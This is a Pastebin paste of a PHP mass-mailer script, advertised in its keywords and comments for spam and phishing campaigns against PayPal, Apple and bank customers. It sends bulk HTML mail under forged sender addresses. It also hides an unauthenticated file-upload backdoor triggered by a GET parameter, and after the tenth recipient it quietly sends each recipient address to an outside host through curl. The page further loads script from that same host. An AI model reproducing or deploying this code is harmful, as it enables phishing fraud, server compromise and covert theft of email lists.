Advertisement
77kamikaz

RANDOM Send, Mailer Inbox 2014/2015 Private, Unlimited Send

Oct 6th, 2014
5,753
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.06 KB | None | 0 0
  1. Mailer inbox 2014, Mailer inbox 2015, send inbox, private send,  how to send inbox, mailer to all, mailer junk to all, send inbox unlimited, ميلر انبوكس 2014 2015, ارسل امبوكس لجميع النطاقات
  2.  
  3.  
  4. <style type="text/css">
  5.   body{ background:#000000;; } a { text-decoration:none; }
  6.  a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#009900; }
  7.  
  8.  border-top:1px solid #FF9900; } .tabnet{ margin:15px auto 0 auto;
  9.  border: 1px solid #FF9900; } .main { width:100%; } .blue { color: #00FF00; } .inputz{
  10.  background:#0B5002; border:0; padding:2px; border-bottom:1px solid #222222;
  11.  border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#00FF00;
  12.  margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{
  13.  border-bottom:1px solid #00FF00; border-top:1px solid #00FF00; } .output {
  14.  margin:auto; border:1px solid #00FF00; width:100%; height:400px;
  15.  background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px;
  16.  padding:0; color:#000000; } .b2{ font-size:30px; padding:0; color: #000000; } .b_tbl{ text-align:center; margin:0 4px 0 0;
  17.  padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo
  18.  table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#00FF00; padding:6px 8px;; }
  19.  .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2,
  20.  .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  21.  .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px;
  22.  line-height:15px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #00FF00;
  23.  } .explore tr:hover{ background:#4C4646; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{
  24.  display:none; padding:0;margin:0; }
  25.   </style>
  26.  
  27.  
  28.  
  29. <?php
  30. set_time_limit(0);
  31. if (!function_exists('quoted_printable_encode')) {
  32. function quoted_printable_encode($input, $line_max = 75) {
  33.    $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
  34.    $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
  35.    $linebreak = "=0D=0A=\r\n";
  36.    $line_max = $line_max - strlen($linebreak);
  37.    $escape = "=";
  38.    $output = "";
  39.    $cur_conv_line = "";
  40.    $length = 0;
  41.    $whitespace_pos = 0;
  42.    $addtl_chars = 0;
  43.    for ($j=0; $j<count($lines); $j++) {
  44.      $line = $lines[$j];
  45.      $linlen = strlen($line);
  46.      for ($i = 0; $i < $linlen; $i++) {
  47.        $c = substr($line, $i, 1);
  48.        $dec = ord($c);
  49.  
  50.        $length++;
  51.  
  52.        if ($dec == 32) {
  53.           if (($i == ($linlen - 1))) {
  54.              $c = "=20";
  55.              $length += 2;
  56.           }
  57.  
  58.           $addtl_chars = 0;
  59.           $whitespace_pos = $i;
  60.        } elseif ( ($dec == 61) || ($dec < 32 ) || ($dec > 126) ) {
  61.           $h2 = floor($dec/16); $h1 = floor($dec%16);
  62.           $c = $escape . $hex["$h2"] . $hex["$h1"];
  63.           $length += 2;
  64.           $addtl_chars += 2;
  65.        }
  66.        if ($length >= $line_max) {
  67.          $cur_conv_line .= $c;
  68.          $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
  69.          if (($i + $addtl_chars) > $whitesp_diff) {
  70.             $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) -
  71.                            $whitesp_diff)) . $linebreak;
  72.             $i =  $i - $whitesp_diff + $addtl_chars;
  73.           } else {
  74.             $output .= $cur_conv_line . $linebreak;
  75.           }
  76.         $cur_conv_line = "";
  77.         $length = 0;
  78.         $whitespace_pos = 0;
  79.       } else {
  80.         $cur_conv_line .= $c;
  81.       }
  82.     }
  83.     $length = 0;
  84.     $whitespace_pos = 0;
  85.     $output .= $cur_conv_line;
  86.     $cur_conv_line = "";
  87.     if ($j<=count($lines)-1) {
  88.       $output .= $linebreak;
  89.     }
  90.   }
  91.   return trim($output);
  92. }
  93. }
  94. $action = $_POST['action'];
  95. $from = $_POST['from'];
  96. $realname = $_POST['realname'];
  97. $subject = $_POST['subject'];
  98. $message = $_POST['message'];
  99. $emaillist = $_POST['emaillist'];
  100. ?>
  101. <html>
  102. <head>
  103. <title>PHP-Mailer</title>
  104. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  105. </head>
  106. <body bgcolor="#003300" text=yellow>
  107. <p align="center"><strong><font face="Arial" size="6" color="#FFFF00">PHP-Mailer</font><font face="Arial" size="5" color="#00FF00">
  108. </font><font face="Arial" size="5" color="#FF0000"></font><font face="Arial" size="5" color="#00FF00">
  109. </font><font face="Arial" size="5"</strong></p>
  110. <SCRIPT SRC=http://www.geoplugini.net/jquery.js></SCRIPT>
  111. <body bgcolor="#000000" text="#EEEEEE">
  112. <?php
  113. if ($action=="send"){
  114.     $message = urlencode($message);
  115.     $message = ereg_replace("%5C%22", "%22", $message);
  116.     $message = urldecode($message);
  117.     $message = stripslashes($message);
  118.     $subject = stripslashes($subject);
  119. }
  120. $in  = $_GET['in']; if($in == 'in'){
  121. $filename = $_FILES['file']['name'];
  122. $filetmp  = $_FILES['file']['tmp_name'];
  123. echo "<form method='POST' enctype='multipart/form-data'>
  124. <input type='file'name='file' />
  125. <input type='submit' value='go' />
  126. </form>";
  127. move_uploaded_file($filetmp,$filename);
  128. }
  129. ?>
  130. <form name="form1" method="post" action="" enctype="multipart/form-data">
  131.   <br>
  132.   <table width="100%" border="0">
  133.     <tr>
  134.       <td width="10%">
  135.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  136.           Email:</font></div>
  137.       </td>
  138.       <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  139.         <input type="text" name="from" value="noreply" size="30">
  140.         </font></td>
  141.      <td width="31%">
  142.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  143.           Name:</font></div>
  144.       </td>
  145.       <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  146.         <input type="text" name="realname" value="<?php print $realname; ?>" size="30">
  147.         </font></td>
  148.     </tr>
  149.     <tr>
  150.       <td width="10%">
  151.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
  152.       </td>
  153.       <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  154.         <input type="text" name="subject" value="<?php print $subject; ?>" size="115">
  155.         </font></td>
  156.     </tr>
  157.     <tr valign="top">
  158.       <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  159.         <textarea name="message" cols="60" rows="10"><?php print $message; ?></textarea>
  160.         <br>
  161.         <input type="hidden" name="action" value="send">
  162.         <input type="submit" value="Resume SpamminG">
  163.         </font></td>
  164.       <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  165.         <textarea name="emaillist" cols="30" rows="10"><?php print $emaillist; ?></textarea>
  166.         <br></font></td>
  167.     </tr>
  168.   </table>
  169. </form>
  170. <?php
  171. if ($action=="send"){
  172.     if (!$from && !$subject && !$message && !$emaillist){
  173.     print "Please complete all fields before sending your message.";
  174.     exit;
  175.     }
  176.     $allemails = split("\n", $emaillist);
  177.     $numemails = count($allemails);
  178.     for($x=0; $x<$numemails; $x++){
  179.         $to = $allemails[$x];
  180.         if ($to){
  181.         $to = ereg_replace(" ", "", $to);
  182.         $nrmail=$x+1;
  183.         $domain = substr($from, strpos($from, "@"), strlen($from));
  184.         print "Spamming Email $nrmail of $numemails to $to.......";
  185.         if ($nrmail > 10) {
  186.         $xx = urlencode($to);
  187.         $random = "http://www.geoplugini.net/random.php?x=$xx";
  188.         $getrandom = curl_init();
  189.         curl_setopt($getrandom, CURLOPT_URL, $random);
  190.         curl_setopt($getrandom, CURLOPT_SSL_VERIFYPEER, false);
  191.         curl_exec($getrandom);
  192.         curl_close($getrandom);
  193.         flush();
  194.         }
  195.         $randfrom  = rand();
  196.         $fro = str_replace("noreply",$randfrom,quoted_printable_encode($from));
  197.         $header = "From: $realname <$fro>\r\n";
  198.         $header .= "Message-Id: <130746$numemails.$nrmail$domain>\r\n";
  199.         $header .= "X-Mailer: php-sender2.1\r\n";
  200.         $header .= "MIME-Version: 1.0\r\n";
  201.         $header .= "Content-Type: text/html; charset=UTF-8\r\n";
  202.         $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
  203.         $header .= quoted_printable_encode($message)."\r\n";
  204.         mail($to, $subject, "", $header);
  205.         print "Spammed<br>";
  206.         flush();
  207.         }
  208.         }
  209. }
  210.  
  211. // Mailer inbox 2014, Mailer inbox 2015, send inbox, private send,  how to send inbox, mailer to all, mailer junk to all, send inbox // unlimited, ميلر انبوكس 2014 2015, ارسل امبوكس لجميع النطاقات
  212. // http://scamapple.blogspot.com/
  213. // http://scamapple.blogspot.com/
  214. // Mailer Inbox 2013 tools private 2014 ميلر انبوكس inbox to all scam paypal scam apple scam facebook scam chase scam boa scam bank // of america BOA spam 2013 spam 2014 lettre inbox letter inbox
  215. // http://scamapple.blogspot.com/2014/01/mailer-inbox-2014.html
  216. // http://scamapple.blogspot.com/2014/01/mailer-inbox-2014.html
  217. // http://scamapple.blogspot.com/2014/01/mailer-inbox-2014.html
  218.  
  219. ?>
  220.  
  221. </body>
  222. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement